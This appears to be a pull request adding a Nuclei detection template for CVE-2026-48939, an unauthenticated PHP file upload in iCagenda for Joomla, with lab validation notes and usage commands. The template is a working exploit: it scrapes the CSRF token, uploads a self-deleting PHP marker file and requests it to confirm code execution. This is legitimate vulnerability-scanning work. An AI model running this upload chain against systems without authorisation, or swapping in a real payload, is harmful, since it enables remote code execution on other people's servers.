### PR TITLE
Add CVE-2026-48939 - iCagenda <= 4.0.7 Unauthenticated Arbitrary File Upload

### DIFF
--- a/http/cves/2026/CVE-2026-48939.yaml
+++ b/http/cves/2026/CVE-2026-48939.yaml
@@ -29,6 +29,7 @@ variables:
   filename: "nuclei-{{to_lower(rand_text_alpha(10))}}.php"
   boundary: "----NucleiBoundary{{randstr}}"
   event_date: "{{date_time('%Y-%M-%D %H:%m:%s')}}"
+  category_id: "{{rand_int(1, 999999)}}"
 
 flow: http(1) && http(2)
 
@@ -38,7 +39,7 @@ http:
         GET {{BaseURL}} HTTP/1.1
         Host: {{Hostname}}
       - |
-        POST {{Scheme}}://{{Hostname}}{{submit_action}} HTTP/1.1
+        POST {{Scheme}}://{{Hostname}}/index.php/component/icagenda?task=submit.submit HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary={{boundary}}
 
@@ -71,14 +72,6 @@ http:
 
         tos
         --{{boundary}}
-        Content-Disposition: form-data; name="jform[itemid]"
-
-        {{item_id}}
-        --{{boundary}}
-        Content-Disposition: form-data; name="itemID"
-
-        {{item_id}}
-        --{{boundary}}
         Content-Disposition: form-data; name="jform[file]"; filename="{{filename}}"
         Content-Type: application/x-php
 
@@ -104,28 +97,6 @@ http:
         internal: true
         regex:
           - 'name="([a-f0-9]{32})"\s+value="1"'
-      - type: regex
-        name: category_id
-        part: body
-        group: 1
-        internal: true
-        regex:
-          - '(?s)<select[^>]*name="jform\[catid\]"[^>]*>.*?<option value="([1-9][0-9]*)"[^>]*>'
-      - type: regex
-        name: item_id
-        part: body
-        group: 1
-        internal: true
-        regex:
-          - 'name="jform\[itemid\]"[^>]*value="([0-9]+)"'
-      - type: regex
-        name: submit_action
-        part: body
-        group: 1
-        internal: true
-        regex:
-          - 'action="([^" ]*task=submit\.submit[^" ]*)"'
-
   - method: GET
     path:
       - "{{Scheme}}://{{Hostname}}/images/icagenda/frontend/attachments/{{filename}}"

--- a/http/cves/2026/CVE-2026-48939.yaml
+++ b/http/cves/2026/CVE-2026-48939.yaml
@@ -1,0 +1,141 @@
+id: CVE-2026-48939
+
+info:
+  name: iCagenda <= 4.0.7 - Unauthenticated Arbitrary File Upload
+  author: Eduard-Cristian Sirbu-Boeti
+  severity: critical
+  description: |
+    iCagenda for Joomla contains an unauthenticated arbitrary file upload vulnerability in the public event-submission attachment handler. On Joomla 6, a successful PHP upload can lead to remote code execution.
+  impact: |
+    An unauthenticated attacker may upload and execute arbitrary code on affected Joomla 6 installations.
+  remediation: |
+    Update iCagenda to version 4.0.8 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-48939
+    - https://www.icagenda.com/docs/changelog/icagenda-4-0-8
+    - https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/
+  classification:
+    cve-id: CVE-2026-48939
+    cwe-id: CWE-434
+  metadata:
+    max-request: 3
+    verified: true
+    vendor: icagenda
+    product: icagenda
+  tags: cve,cve2026,joomla,icagenda,file-upload,rce,unauth,intrusive
+
+variables:
+  marker: "{{randstr}}"
+  filename: "nuclei-{{to_lower(rand_text_alpha(10))}}.php"
+  boundary: "----NucleiBoundary{{randstr}}"
+  event_date: "{{date_time('%Y-%M-%D %H:%m:%s')}}"
+
+flow: http(1) && http(2)
+
+http:
+  - raw:
+      - |
+        GET {{BaseURL}} HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST {{Scheme}}://{{Hostname}}{{submit_action}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary={{boundary}}
+
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[username]"
+
+        Nuclei Test
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[created_by_email]"
+
+        research@example.invalid
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[title]"
+
+        Nuclei {{marker}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[catid]"
+
+        {{category_id}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[startdate]"
+
+        {{event_date}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[enddate]"
+
+        {{event_date}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[consent][consent_tos]"
+
+        tos
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[itemid]"
+
+        {{item_id}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="itemID"
+
+        {{item_id}}
+        --{{boundary}}
+        Content-Disposition: form-data; name="jform[file]"; filename="{{filename}}"
+        Content-Type: application/x-php
+
+        <?php echo "{{marker}}"; @unlink(__FILE__); ?>
+        --{{boundary}}
+        Content-Disposition: form-data; name="{{csrf_token}}"
+
+        1
+        --{{boundary}}--
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_2 == 303"
+          - "contains(header_2, '/submitted')"
+        internal: true
+
+    extractors:
+      - type: regex
+        name: csrf_token
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="([a-f0-9]{32})"\s+value="1"'
+      - type: regex
+        name: category_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - '(?s)<select[^>]*name="jform\[catid\]"[^>]*>.*?<option value="([1-9][0-9]*)"[^>]*>'
+      - type: regex
+        name: item_id
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'name="jform\[itemid\]"[^>]*value="([0-9]+)"'
+      - type: regex
+        name: submit_action
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - 'action="([^" ]*task=submit\.submit[^" ]*)"'
+
+  - method: GET
+    path:
+      - "{{Scheme}}://{{Hostname}}/images/icagenda/frontend/attachments/{{filename}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{marker}}"
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### PR Information

- Added CVE-2026-48939
- Adds an intrusive HTTP template for the unauthenticated file-upload vulnerability in iCagenda <= 4.0.7’s public Submit Event attachment flow.
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2026-48939
  - https://www.icagenda.com/docs/changelog/icagenda-4-0-8
  - https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a patched version and/or configuration (avoid False Positive)

#### Additional Details

Validation was performed in an isolated local Docker lab using Joomla 6.

- iCagenda 4.0.7: template detected the upload and marker execution.
- iCagenda 4.0.8: upload was rejected and the template returned no finding.
- Nuclei version: v3.11.0
- Template validation: `nuclei -duc -validate -t http/cves/2026/CVE-2026-48939.yaml`

Redacted positive result:

```text
[CVE-2026-48939] [http] [critical] https://redacted/images/icagenda/frontend/attachments/nuclei-<random>.php
```

#### Configuration observations

- Validation used a clean Joomla 6 and iCagenda installation with the default active public Submit Event fields.
- The template submits the server-required core fields observed in the default public Submit Event form. This keeps the request compatible with standard deployments where optional display fields may be enabled or disabled.
- iCagenda’s public Submit Event handler still accepted the request when a required custom event field was present but omitted, indicating that this custom-field requirement was enforced client-side in the tested configuration.
- The public Submit Event form must remain functional. In the tested version, hiding the **Period/Dates** controls caused the server to reject submissions with `Field required: Dates`; this is a component configuration inconsistency rather than a template finding.

#### Usage

The template target must be the public **Submit an Event** page, not only the Joomla site root.

For multiple public submission pages, provide one URL per line:

```text
https://example.com/submit-event-a
https://example.com/submit-event-b
```

```sh
nuclei -duc \
  -t http/cves/2026/CVE-2026-48939.yaml \
  -l submit-event-urls.txt
```


For one page, users can instead use:

```sh
nuclei -duc \
  -t http/cves/2026/CVE-2026-48939.yaml \
  -u https://example.com/submit-event
```